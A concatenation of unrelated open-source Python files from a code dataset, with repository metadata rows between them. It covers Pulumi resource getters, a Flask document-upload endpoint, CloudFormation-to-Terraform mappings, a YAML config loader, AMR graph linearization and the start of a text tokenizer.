def repo_upgrade_on_boot(self) -> pulumi.Output[Optional[str]]:
"""
Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
"""
return pulumi.get(self, "repo_upgrade_on_boot")
@property
@pulumi.getter
def retries(self) -> pulumi.Output[Optional[int]]:
"""
Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
"""
return pulumi.get(self, "retries")
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarScheduledTask']]]:
"""
An array of scheduled tasks.
"""
return pulumi.get(self, "scheduled_tasks")
@property
@pulumi.getter(name="securityConfig")
def security_config(self) -> pulumi.Output[Optional[str]]:
"""
The name of the security configuration applied to the cluster.
"""
return pulumi.get(self, "security_config")
@property
@pulumi.getter(name="serviceAccessSecurityGroup")
def service_access_security_group(self) -> pulumi.Output[Optional[str]]:
"""
The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
"""
return pulumi.get(self, "service_access_security_group")
@property
@pulumi.getter(name="serviceRole")
def service_role(self) -> pulumi.Output[Optional[str]]:
"""
The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
"""
return pulumi.get(self, "service_role")
@property
@pulumi.getter(name="stepsFiles")
def steps_files(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarStepsFile']]]:
"""
Steps from S3.
"""
return pulumi.get(self, "steps_files")
@property
@pulumi.getter
def strategy(self) -> pulumi.Output[str]:
"""
The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
"""
return pulumi.get(self, "strategy")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTag']]]:
"""
A list of tags to assign to the resource. You may define multiple tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="taskDesiredCapacity")
def task_desired_capacity(self) -> pulumi.Output[Optional[int]]:
"""
amount of instances in task group.
"""
return pulumi.get(self, "task_desired_capacity")
@property
@pulumi.getter(name="taskEbsBlockDevices")
def task_ebs_block_devices(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTaskEbsBlockDevice']]]:
"""
This determines the ebs configuration for your task group instances. Only a single block is allowed.
"""
return pulumi.get(self, "task_ebs_block_devices")
@property
@pulumi.getter(name="taskEbsOptimized")
def task_ebs_optimized(self) -> pulumi.Output[Optional[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "task_ebs_optimized")
@property
@pulumi.getter(name="taskInstanceTypes")
def task_instance_types(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The MrScaler instance types for the task nodes.
"""
return pulumi.get(self, "task_instance_types")
@property
@pulumi.getter(name="taskLifecycle")
def task_lifecycle(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "task_lifecycle")
@property
@pulumi.getter(name="taskMaxSize")
def task_max_size(self) -> pulumi.Output[Optional[int]]:
"""
maximal amount of instances in task group.
"""
return pulumi.get(self, "task_max_size")
@property
@pulumi.getter(name="taskMinSize")
def task_min_size(self) -> pulumi.Output[Optional[int]]:
"""
The minimal amount of instances in task group.
"""
return pulumi.get(self, "task_min_size")
@property
@pulumi.getter(name="taskScalingDownPolicies")
def task_scaling_down_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTaskScalingDownPolicy']]]:
    """
    The scaling-down policies attached to the task group, if any were configured.
    """
    return pulumi.get(self, "task_scaling_down_policies")
@property
@pulumi.getter(name="taskScalingUpPolicies")
def task_scaling_up_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTaskScalingUpPolicy']]]:
    """
    The scaling-up policies attached to the task group, if any were configured.
    """
    return pulumi.get(self, "task_scaling_up_policies")
@property
@pulumi.getter(name="taskUnit")
def task_unit(self) -> pulumi.Output[Optional[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "task_unit")
@property
@pulumi.getter(name="terminationPolicies")
def termination_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTerminationPolicy']]]:
"""
Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
"""
return pulumi.get(self, "termination_policies")
@property
@pulumi.getter(name="terminationProtected")
def termination_protected(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
return pulumi.get(self, "termination_protected")
@property
@pulumi.getter(name="visibleToAllUsers")
def visible_to_all_users(self) -> pulumi.Output[Optional[bool]]:
    """
    Mirrors the `visibleToAllUsers` cluster setting — presumably EMR's IAM-visibility
    flag; confirm exact semantics against the provider documentation.
    """
    return pulumi.get(self, "visible_to_all_users")
| 52.88346 | 338 | 0.679738 | 173,787 | 0.997337 | 0 | 0 | 161,702 | 0.927983 | 0 | 0 | 84,111 | 0.4827 |
6361591f69d6d58dde012798f78f229535fcd8bf | 4,189 | py | Python | python-backend/app/api/mines/variances/resources/variance_document_upload.py | ActionAnalytics/mds | 7ac61b0b73b1d310db7dcf2d830b5746b851fe4a | [
"Apache-2.0"
] | null | null | null | python-backend/app/api/mines/variances/resources/variance_document_upload.py | ActionAnalytics/mds | 7ac61b0b73b1d310db7dcf2d830b5746b851fe4a | [
"Apache-2.0"
] | null | null | null | python-backend/app/api/mines/variances/resources/variance_document_upload.py | ActionAnalytics/mds | 7ac61b0b73b1d310db7dcf2d830b5746b851fe4a | [
"Apache-2.0"
] | null | null | null | import base64
import requests
from werkzeug.exceptions import BadRequest, NotFound
from flask import request, current_app, Response
from flask_restplus import Resource
from app.extensions import api
from ...mine.models.mine import Mine
from ....documents.mines.models.mine_document import MineDocument
from ....documents.variances.models.variance import VarianceDocumentXref
from ....utils.access_decorators import (requires_any_of, MINE_CREATE,
MINESPACE_PROPONENT)
from ....utils.resources_mixins import UserMixin, ErrorMixin
from app.api.utils.custom_reqparser import CustomReqparser
from app.api.mines.mine_api_models import VARIANCE_MODEL
from app.api.variances.models.variance import Variance
class MineVarianceDocumentUploadResource(Resource, UserMixin, ErrorMixin):
    """REST resource for uploading documents and attaching them to a mine variance."""

    @api.doc(description='Request a document_manager_guid for uploading a document')
    @requires_any_of([MINE_CREATE, MINESPACE_PROPONENT])
    def post(self, mine_guid, variance_guid):
        """Initiate a file upload by proxying to the document manager service.

        Reads the `Upload-Metadata` request header (base64 key/value pairs),
        validates that a filename was supplied, then forwards the request —
        headers, form data and cookies — to the configured document manager
        and relays its response back to the caller.
        """
        metadata = self._parse_request_metadata()
        if not metadata or not metadata.get('filename'):
            raise BadRequest('Filename not found in request metadata header')

        # Save file
        mine = Mine.find_by_mine_guid(mine_guid)
        document_name = metadata.get('filename')
        # Storage location uses the mine guid; pretty path uses the mine number.
        data = {
            'folder': f'mines/{mine.mine_guid}/variances',
            'pretty_folder': f'mines/{mine.mine_no}/variances',
            'filename': document_name
        }

        document_manager_URL = f'{current_app.config["DOCUMENT_MANAGER_URL"]}/document-manager'

        # Forward the original request, dropping the Host header so the
        # downstream service sees its own host.
        resp = requests.post(
            url=document_manager_URL,
            headers={key: value
                     for (key, value) in request.headers if key != 'Host'},
            data=data,
            cookies=request.cookies,
        )

        # Relay the document manager's response (body, status code, raw headers).
        response = Response(str(resp.content), resp.status_code, resp.raw.headers.items())
        return response

    @api.doc(
        description='Associate an uploaded file with a variance.',
        params={
            'mine_guid': 'guid for the mine with which the variance is associated',
            'variance_guid': 'GUID for the variance to which the document should be associated'
        })
    @api.marshal_with(VARIANCE_MODEL, code=200)
    @requires_any_of([MINE_CREATE, MINESPACE_PROPONENT])
    def put(self, mine_guid, variance_guid):
        """Register an uploaded file as a MineDocument and attach it to the variance.

        Expects `document_name`, `document_manager_guid` and
        `variance_document_category_code` in the request body. Returns the
        updated variance (marshalled with VARIANCE_MODEL).
        """
        parser = CustomReqparser()
        # Arguments required by MineDocument
        parser.add_argument('document_name', type=str, required=True)
        parser.add_argument('document_manager_guid', type=str, required=True)
        parser.add_argument('variance_document_category_code', type=str, required=True)

        variance = Variance.find_by_variance_guid(variance_guid)
        if not variance:
            raise NotFound('Unable to fetch variance.')

        data = parser.parse_args()
        document_name = data.get('document_name')
        document_manager_guid = data.get('document_manager_guid')

        # Register new file upload
        mine_doc = MineDocument(
            mine_guid=mine_guid,
            document_manager_guid=document_manager_guid,
            document_name=document_name)

        # NOTE(review): the constructor call above always returns an instance,
        # so this guard can never fire — confirm what existence check was intended.
        if not mine_doc:
            raise BadRequest('Unable to register uploaded file as document')

        # Associate Variance & MineDocument to create Variance Document
        # Add fields specific to Variance Documents
        mine_doc.save()
        variance_doc = VarianceDocumentXref(
            mine_document_guid=mine_doc.mine_document_guid,
            variance_id=variance.variance_id,
            variance_document_category_code=data.get('variance_document_category_code'))

        variance.documents.append(variance_doc)
        variance.save()

        return variance

    def _parse_request_metadata(self):
        """Decode the `Upload-Metadata` request header into a dict.

        The header appears to follow the tus upload convention: a
        comma-separated list of `key base64value` pairs; each value is
        base64-decoded to a UTF-8 string. Returns {} when the header is absent.
        """
        request_metadata = request.headers.get("Upload-Metadata")
        metadata = {}
        if not request_metadata:
            return metadata

        for key_value in request_metadata.split(","):
            (key, value) = key_value.split(" ")
            metadata[key] = base64.b64decode(value).decode("utf-8")

        return metadata
| 39.518868 | 95 | 0.681308 | 3,444 | 0.822153 | 0 | 0 | 2,973 | 0.709716 | 0 | 0 | 914 | 0.21819 |
63625b735919dfc4cb5cbf688dbf97a5a8eb7672 | 2,709 | py | Python | src/generated-spec/data_pipeline.py | wheerd/cloudformation-to-terraform | 5411b33293e1f7d7673bb5d4cb52ff0537240db3 | [
"MIT"
] | null | null | null | src/generated-spec/data_pipeline.py | wheerd/cloudformation-to-terraform | 5411b33293e1f7d7673bb5d4cb52ff0537240db3 | [
"MIT"
] | null | null | null | src/generated-spec/data_pipeline.py | wheerd/cloudformation-to-terraform | 5411b33293e1f7d7673bb5d4cb52ff0537240db3 | [
"MIT"
] | null | null | null | from . import *
class AWS_DataPipeline_Pipeline_ParameterAttribute(CloudFormationProperty):
    """Generated mapping of the CloudFormation `ParameterAttribute` sub-property."""

    def write(self, w):
        # Emit the Terraform `parameter_attribute` block with its key/value pair.
        with w.block("parameter_attribute"):
            self.property(w, "Key", "key", StringValueConverter())
            self.property(w, "StringValue", "string_value", StringValueConverter())
class AWS_DataPipeline_Pipeline_PipelineTag(CloudFormationProperty):
    """Generated mapping of the CloudFormation `PipelineTag` sub-property."""

    def write(self, w):
        # Emit the Terraform `pipeline_tag` block with its key/value pair.
        with w.block("pipeline_tag"):
            self.property(w, "Key", "key", StringValueConverter())
            self.property(w, "Value", "value", StringValueConverter())
class AWS_DataPipeline_Pipeline_ParameterObject(CloudFormationProperty):
    """Generated mapping of the CloudFormation `ParameterObject` sub-property."""

    def write(self, w):
        # Emit the Terraform `parameter_object` block: nested attributes plus id.
        with w.block("parameter_object"):
            self.repeated_block(w, "Attributes", AWS_DataPipeline_Pipeline_ParameterAttribute)
            self.property(w, "Id", "id", StringValueConverter())
class AWS_DataPipeline_Pipeline_ParameterValue(CloudFormationProperty):
    """Generated mapping of the CloudFormation `ParameterValue` sub-property."""

    def write(self, w):
        # Emit the Terraform `parameter_value` block with its id/value pair.
        with w.block("parameter_value"):
            self.property(w, "Id", "id", StringValueConverter())
            self.property(w, "StringValue", "string_value", StringValueConverter())
class AWS_DataPipeline_Pipeline_Field(CloudFormationProperty):
    """Generated mapping of the CloudFormation `Field` sub-property."""

    def write(self, w):
        # Emit the Terraform `field` block; a field carries a key plus either
        # a reference value or a literal string value.
        with w.block("field"):
            self.property(w, "Key", "key", StringValueConverter())
            self.property(w, "RefValue", "ref_value", StringValueConverter())
            self.property(w, "StringValue", "string_value", StringValueConverter())
class AWS_DataPipeline_Pipeline_PipelineObject(CloudFormationProperty):
    """Generated mapping of the CloudFormation `PipelineObject` sub-property."""

    def write(self, w):
        # Emit the Terraform `pipeline_object` block: nested fields plus id/name.
        with w.block("pipeline_object"):
            self.repeated_block(w, "Fields", AWS_DataPipeline_Pipeline_Field)
            self.property(w, "Id", "id", StringValueConverter())
            self.property(w, "Name", "name", StringValueConverter())
class AWS_DataPipeline_Pipeline(CloudFormationResource):
    """Generated mapping of AWS::DataPipeline::Pipeline to aws_datapipeline_pipeline."""

    cfn_type = "AWS::DataPipeline::Pipeline"
    tf_type = "aws_datapipeline_pipeline"
    ref = "id"  # CloudFormation Ref maps to the Terraform resource id
    attrs = {}  # no Fn::GetAtt attributes mapped

    def write(self, w):
        # Emit the full Terraform resource block; several mappings are flagged
        # as unverified by the generator (see TODOs).
        with self.resource_block(w):
            self.property(w, "Activate", "activate", BasicValueConverter())  # TODO: Probably not the correct mapping
            self.property(w, "Description", "description", StringValueConverter())
            self.property(w, "Name", "name", StringValueConverter())
            self.repeated_block(w, "ParameterObjects", AWS_DataPipeline_Pipeline_ParameterObject)  # TODO: Probably not the correct mapping
            self.repeated_block(w, "ParameterValues", AWS_DataPipeline_Pipeline_ParameterValue)  # TODO: Probably not the correct mapping
            self.repeated_block(w, "PipelineObjects", AWS_DataPipeline_Pipeline_PipelineObject)  # TODO: Probably not the correct mapping
            self.repeated_block(w, "PipelineTags", AWS_DataPipeline_Pipeline_PipelineTag)
| 42.328125 | 132 | 0.741602 | 2,671 | 0.985973 | 0 | 0 | 0 | 0 | 0 | 0 | 640 | 0.23625 |
63644d194b8d4b983a5942a1f10e9cd725bc6bed | 2,295 | py | Python | rl_algorithms/utils/config.py | medipixel/rl_algorithms | 96bceb9d65c6d66fca59c4115cd7947f87b87ebc | [
"MIT"
] | 466 | 2019-02-14T15:06:01.000Z | 2022-03-28T03:08:10.000Z | rl_algorithms/utils/config.py | blakcapple/rl_algorithms | 96bceb9d65c6d66fca59c4115cd7947f87b87ebc | [
"MIT"
] | 138 | 2019-02-15T05:44:17.000Z | 2021-12-15T06:00:55.000Z | rl_algorithms/utils/config.py | medipixel/reinforcement_learning_examples | c5f7d1d60dcefb3050d75c5c657207183bd8db65 | [
"MIT"
] | 86 | 2019-02-25T15:52:29.000Z | 2022-03-08T06:30:36.000Z | import collections.abc as collections_abc
import os.path as osp
from addict import Dict
import yaml
class ConfigDict(Dict):
    """addict.Dict subclass with strict lookups.

    Unlike addict's default behaviour (silently creating an empty child dict
    for a missing key), a missing key raises, and attribute access on a
    missing name raises AttributeError as a plain object would.
    """

    def __missing__(self, name):
        # Strict lookup: never auto-create missing entries.
        raise KeyError(name)

    def __getattr__(self, name):
        """Attribute access that converts a KeyError into AttributeError."""
        try:
            value = super(ConfigDict, self).__getattr__(name)
        except KeyError:
            ex = AttributeError(
                "'{}' object has no attribute '{}'".format(
                    self.__class__.__name__, name
                )
            )
        except Exception as e:
            # Re-raise any other failure unchanged (outside the except block
            # so the original traceback context is not chained confusingly).
            ex = e
        else:
            return value
        raise ex

    def __setitem__(self, name, value):
        # Recursively wrap plain dicts so nested values keep ConfigDict semantics.
        if isinstance(value, dict):
            value = ConfigDict(value)
        super(ConfigDict, self).__setitem__(name, value)
def add_args(parser, cfg, prefix=""):
    """Recursively register a command-line flag for every entry of *cfg*.

    Flag names are ``--<prefix><key>``; nested dicts recurse with
    ``<key>.`` appended to the prefix. The argument type mirrors the config
    value's type: bool -> store_true flag, str/int/float -> typed option,
    other iterables -> ``nargs='+'`` typed by the first element. Unhandled
    types are reported and skipped.

    Returns the parser to allow chaining.
    """
    for k, v in cfg.items():
        arg = "--" + prefix + k
        # bool must be checked before int: bool is a subclass of int, so the
        # previous int-first ordering registered booleans as integer options.
        if isinstance(v, bool):
            parser.add_argument(arg, action="store_true")
        elif isinstance(v, str):
            parser.add_argument(arg)
        elif isinstance(v, int):
            parser.add_argument(arg, type=int)
        elif isinstance(v, float):
            parser.add_argument(arg, type=float)
        elif isinstance(v, dict):
            add_args(parser, v, k + ".")
        elif isinstance(v, collections_abc.Iterable):
            # Homogeneous sequence assumed; typed by its first element.
            parser.add_argument(arg, type=type(v[0]), nargs="+")
        else:
            print("cannot parse key {} of type {}".format(prefix + k, type(v)))
    return parser
class YamlConfig:
    """Manager of ConfigDict from yaml."""

    def __init__(self, config_paths: dict):
        """Make ConfigDict from yaml path.

        config_paths maps a config name to a yaml file path; each file is
        loaded into self.cfg under its name.
        """
        self.cfg = ConfigDict()
        for key, path in config_paths.items():
            self.cfg[key] = self._yaml_to_config_dict(path)

    @staticmethod
    def _yaml_to_config_dict(path: str) -> ConfigDict:
        """Return ConfigDict from yaml.

        Tries the path as given first; on FileNotFoundError retries with
        '~' expanded to the user's home directory.
        """
        try:
            with open(path) as f:
                data = yaml.load(f, Loader=yaml.FullLoader)
        except FileNotFoundError:
            with open(osp.expanduser(path)) as f:
                data = yaml.load(f, Loader=yaml.FullLoader)
        return ConfigDict(data)

    def get_config_dict(self):
        """Return the aggregated ConfigDict of all loaded configs."""
        return self.cfg
| 30.6 | 79 | 0.568192 | 1,419 | 0.618301 | 0 | 0 | 394 | 0.171678 | 0 | 0 | 216 | 0.094118 |
63645da097f4e87f2edd1db2b89287cf483492a1 | 7,748 | py | Python | elit/components/amr/amr_parser/amr_graph.py | emorynlp/el | dbe73d1ce6f2296a64fb013775d2691ae1ed90d4 | [
"Apache-2.0"
] | 40 | 2017-02-27T20:16:44.000Z | 2022-03-25T04:58:01.000Z | elit/components/amr/amr_parser/amr_graph.py | emorynlp/el | dbe73d1ce6f2296a64fb013775d2691ae1ed90d4 | [
"Apache-2.0"
] | 12 | 2017-02-16T23:50:38.000Z | 2022-01-19T21:29:59.000Z | elit/components/amr/amr_parser/amr_graph.py | emorynlp/levi-graph-amr-parser | f71f1056c13181b8db31d6136451fb8d57114819 | [
"Apache-2.0"
] | 6 | 2017-05-05T08:02:18.000Z | 2021-11-03T23:47:23.000Z | # MIT License
#
# Copyright (c) 2020 Deng Cai
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
import re
from collections import defaultdict
from toposort import toposort, CircularDependencyError
from elit.components.amr.amr_parser.data import REL
number_regexp = re.compile(r'^-?(\d)+(\.\d+)?$')
abstract_regexp0 = re.compile(r'^([A-Z]+_)+\d+$')
abstract_regexp1 = re.compile(r'^\d0*$')
discard_regexp = re.compile(r'^n(\d+)?$')
attr_value_set = set(['-', '+', 'interrogative', 'imperative', 'expressive'])
def _is_attr_form(x):
return (x in attr_value_set or x.endswith('_') or number_regexp.match(x) is not None)
def _is_abs_form(x):
return (abstract_regexp0.match(x) is not None or abstract_regexp1.match(x) is not None)
def is_attr_or_abs_form(x):
return _is_attr_form(x) or _is_abs_form(x)
def need_an_instance(x):
return (not _is_attr_form(x) or (abstract_regexp0.match(x) is not None))
class AMRGraph(object):
    """In-memory AMR graph built from a smatch-format AMR.

    Holds node names, a name->concept map, and three edge indexes
    (forward, reversed, and undirected with '_reverse_'-suffixed back
    relations), plus linearization helpers for model input.
    """

    def __init__(self, smatch_amr):
        # transform amr from original smatch format into our own data structure
        instance_triple, attribute_triple, relation_triple = smatch_amr.get_triples()
        self.root = smatch_amr.root
        self.nodes = set()
        self.edges = dict()
        self.reversed_edges = dict()
        self.undirected_edges = dict()
        self.name2concept = dict()
        # will do some adjustments
        self.abstract_concepts = dict()
        # Instance triples: record every concept; remember the abstract
        # (anonymized) ones separately.
        for _, name, concept in instance_triple:
            if is_attr_or_abs_form(concept):
                if _is_abs_form(concept):
                    self.abstract_concepts[name] = concept
                else:
                    # print('bad concept', _, name, concept)
                    pass
            self.name2concept[name] = concept
            self.nodes.add(name)
        # Attribute triples become synthetic "<value>_attr_<i>" nodes linked
        # to their owning concept.
        for rel, concept, value in attribute_triple:
            if rel == 'TOP':
                continue
            # discard some empty names
            if rel == 'name' and discard_regexp.match(value):
                continue
            # abstract concept can't have an attribute
            if concept in self.abstract_concepts:
                # print(rel, self.abstract_concepts[concept], value, "abstract concept cannot have an attribute")
                continue
            name = "%s_attr_%d" % (value, len(self.name2concept))
            if not _is_attr_form(value):
                if _is_abs_form(value):
                    self.abstract_concepts[name] = value
                else:
                    # print('bad attribute', rel, concept, value)
                    continue
            self.name2concept[name] = value
            self._add_edge(rel, concept, name)
        for rel, head, tail in relation_triple:
            self._add_edge(rel, head, tail)
        # lower concept
        # (abstract concepts keep their original casing, which identifies them)
        for name in self.name2concept:
            v = self.name2concept[name]
            if not _is_abs_form(v):
                v = v.lower()
            self.name2concept[name] = v

    def __len__(self):
        # Number of concepts (instance + synthetic attribute nodes).
        return len(self.name2concept)

    def _add_edge(self, rel, src, des):
        """Record src --rel--> des in all three edge indexes; the undirected
        index stores the back edge with a '_reverse_' suffix on the relation."""
        self.nodes.add(src)
        self.nodes.add(des)
        self.edges[src] = self.edges.get(src, []) + [(rel, des)]
        self.reversed_edges[des] = self.reversed_edges.get(des, []) + [(rel, src)]
        self.undirected_edges[src] = self.undirected_edges.get(src, []) + [(rel, des)]
        self.undirected_edges[des] = self.undirected_edges.get(des, []) + [(rel + '_reverse_', src)]

    def root_centered_sort(self, rel_order=None, shuffle=True):
        """Linearize the graph by BFS from the root.

        Optionally shuffles and/or sorts each node's neighbor list by
        *rel_order* (a relation -> rank callable). Returns
        (concepts in visit order, edges as (src_pos, des_pos, relation),
        not_connected flag); asserts the graph is connected.
        """
        queue = [self.root]
        visited = set(queue)
        step = 0
        while len(queue) > step:
            src = queue[step]
            step += 1
            if src not in self.undirected_edges:
                continue
            if shuffle:
                random.shuffle(self.undirected_edges[src])
            if rel_order is not None:
                # Do some random thing here for performance enhancement
                # (randomly restrict the ordering to snt*/op* relations half the time)
                if shuffle and random.random() < 0.5:
                    self.undirected_edges[src].sort(
                        key=lambda x: -rel_order(x[0]) if (x[0].startswith('snt') or x[0].startswith('op')) else -1)
                else:
                    self.undirected_edges[src].sort(key=lambda x: -rel_order(x[0]))
            for rel, des in self.undirected_edges[src]:
                if des in visited:
                    continue
                else:
                    queue.append(des)
                    visited.add(des)
        not_connected = len(queue) != len(self.nodes)
        assert (not not_connected)
        name2pos = dict(zip(queue, range(len(queue))))

        visited = set()
        edge = []
        for x in queue:
            if x not in self.undirected_edges:
                continue
            for r, y in self.undirected_edges[x]:
                # Only emit each edge once: when the other endpoint was
                # already processed, orient the relation toward it.
                if y in visited:
                    r = r[:-9] if r.endswith('_reverse_') else r + '_reverse_'
                    edge.append((name2pos[x], name2pos[y], r))  # x -> y: r
            visited.add(x)
        return [self.name2concept[x] for x in queue], edge, not_connected

    def to_levi(self, rel_order=None, shuffle=True):
        """Linearize as a Levi graph: each relation becomes its own node.

        Relation nodes ('rel_<i>', labelled REL+relation) are inserted
        between head and tail, ordered by topological layers (cycles are
        silently truncated). Returns (node labels, edges as
        (pos, dependency_pos, '')).
        """
        dependencies = defaultdict(set)
        name2instance = dict()
        name2instance.update(self.name2concept)
        for u, rs in self.edges.items():
            for r, v in rs:
                # u --r--> v
                r = REL + r
                r_name = f'rel_{len(name2instance)}'
                name2instance[r_name] = r
                dependencies[v].add(r_name)
                dependencies[r_name].add(u)
        gs = []
        try:
            for g in toposort(dependencies):
                gs.append(g)
        except CircularDependencyError:
            # Keep the layers produced before the cycle was detected.
            pass
        node_seq = []
        for g in gs:
            g = list(g)
            if rel_order:
                if shuffle:
                    if random.random() < 0.5:
                        g = sorted(g, key=lambda x: -rel_order(name2instance[x]) if (
                                name2instance[x].startswith('snt') or name2instance[x].startswith('op')) else -1)
                    else:
                        random.shuffle(g)
                else:
                    g = sorted(g, key=lambda x: -rel_order(name2instance[x]))
            # accumulate this topological layer
            node_seq += g
        ind = dict(map(reversed, enumerate(node_seq)))
        edge = []
        for v, us in dependencies.items():
            if v not in ind:
                continue
            for u in us:
                if u not in ind:
                    continue
                edge.append((ind[v], ind[u], ''))
        return [name2instance[x] for x in node_seq], edge
| 38.934673 | 116 | 0.576278 | 5,800 | 0.74858 | 0 | 0 | 0 | 0 | 0 | 0 | 1,732 | 0.223542 |
636a9b71316125fb79b3ddc33da9e14bd47d75ca | 5,252 | py | Python | passage/preprocessing.py | vishalbelsare/Passage | af6e100804dfe332c88bd2cd192e93a807377887 | [
"MIT"
] | 597 | 2015-01-15T19:23:32.000Z | 2021-08-29T17:53:22.000Z | passage/preprocessing.py | v-mk-s/Passage | af6e100804dfe332c88bd2cd192e93a807377887 | [
"MIT"
] | 34 | 2015-01-22T13:50:21.000Z | 2018-06-13T14:58:45.000Z | passage/preprocessing.py | v-mk-s/Passage | af6e100804dfe332c88bd2cd192e93a807377887 | [
"MIT"
] | 152 | 2015-01-17T02:19:22.000Z | 2022-02-05T15:10:04.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import string
from collections import Counter
import numpy as np
import theano
import theano.tensor as T
# Characters treated as token boundaries by tokenize(): ASCII punctuation
# plus newline/tab and common typographic quote characters.
punctuation = set(string.punctuation)
punctuation.add('\n')
punctuation.add('\t')
punctuation.add(u'’')
punctuation.add(u'‘')
punctuation.add(u'“')
punctuation.add(u'”')
punctuation.add(u'´')
punctuation.add('')  # NOTE(review): '' can never equal a single character; looks dead
def one_hot(X, n=None, negative_class=0.):
    """Encode integer class labels as a (len(X), n) one-hot float matrix.

    Non-target entries are filled with *negative_class*; when *n* is None
    it defaults to max(label) + 1.
    """
    labels = np.asarray(X).flatten()
    if n is None:
        n = np.max(labels) + 1
    encoded = np.full((len(labels), n), negative_class, dtype=float)
    encoded[np.arange(len(labels)), labels] = 1.
    return encoded
def flatten(l):
    """Concatenate a list of lists into a single flat list."""
    flat = []
    for sub in l:
        flat.extend(sub)
    return flat
def lbf(l, b):
    """List-by-flag: keep elements of *l* whose parallel entry in *b* is truthy."""
    kept = []
    for element, flag in zip(l, b):
        if flag:
            kept.append(element)
    return kept
def list_index(l, idxs):
    """Select the elements of *l* at the positions given in *idxs*."""
    return list(map(l.__getitem__, idxs))
def tokenize(text):
    """Split *text* into word and punctuation tokens.

    Characters in the module-level `punctuation` set become their own
    tokens; spaces separate words; empty tokens are dropped.
    """
    tokens = []
    buf = ''
    for ch in text:
        if ch in punctuation:
            # Flush the current word, then emit the punctuation itself.
            tokens.append(buf)
            tokens.append(ch)
            buf = ''
        elif ch == ' ':
            tokens.append(buf)
            buf = ''
        else:
            buf += ch
    if buf != '':
        tokens.append(buf)
    return [tok for tok in tokens if tok]
def token_encoder(texts, max_features=9997, min_df=10):
    """Build a token -> integer-id map from tokenized documents.

    Counts document frequency (each token counted once per document),
    drops tokens seen in fewer than *min_df* documents, keeps at most
    *max_features* tokens ordered by descending frequency, and assigns ids
    starting at 3 (0-2 are reserved for PAD/END/UNK by the caller).

    Fix: the previous `np.asarray(df.values())` broke on Python 3, where
    dict.values() is a view and numpy wraps it as a 0-d object array.
    """
    df = Counter()
    for text in texts:
        # set() so a token contributes at most once per document
        df.update(set(text))
    items = [(tok, cnt) for tok, cnt in df.items() if cnt >= min_df]
    # Descending document frequency; ties were previously in arbitrary
    # (argsort) order, so the stable sort here is an acceptable refinement.
    items.sort(key=lambda kv: kv[1], reverse=True)
    items = items[:max_features]
    return {tok: idx for idx, (tok, _) in enumerate(items, start=3)}
def standardize_targets(Y, cost):
    """Reshape/encode targets *Y* to match the conventions of *cost*.

    - Ensures Y is 2-D (1-D input becomes a column vector).
    - One-hot encodes single-column targets for CategoricalCrossEntropy.
    - For hinge losses: one-hot with -1 negatives when multiclass, or maps
      {0, 1} labels to {-1, 1} in place when binary.

    Note: the cost is matched by its function __name__, not by identity.
    """
    Y = np.asarray(Y)
    ndim = len(Y.shape)
    if ndim == 1:
        Y = Y.reshape(-1, 1)
    if Y.shape[1] == 1 and cost.__name__ == 'CategoricalCrossEntropy':
        Y = one_hot(Y, negative_class=0.)
    if Y.shape[1] == 1 and 'Hinge' in cost.__name__:
        if len(np.unique(Y)) > 2:
            Y = one_hot(Y, negative_class=-1.)
        else:
            # Binary case: shift the 0 labels to -1 for hinge losses.
            Y[Y==0] -= 1
    return Y
class Tokenizer(object):
    """
    For converting lists of text into tokens used by Passage models.
    max_features sets the maximum number of tokens (all others are mapped to UNK)
    min_df sets the minimum number of documents a token must appear in to not get mapped to UNK
    lowercase controls whether the text is lowercased or not
    character sets whether the tokenizer works on a character or word level

    Usage:
    >>> from passage.preprocessing import Tokenizer
    >>> example_text = ['This. is.', 'Example TEXT', 'is text']
    >>> tokenizer = Tokenizer(min_df=1, lowercase=True, character=False)
    >>> tokenized = tokenizer.fit_transform(example_text)
    >>> tokenized
    [[7, 5, 3, 5], [6, 4], [3, 4]]
    >>> tokenizer.inverse_transform(tokenized)
    ['this . is .', 'example text', 'is text']
    """

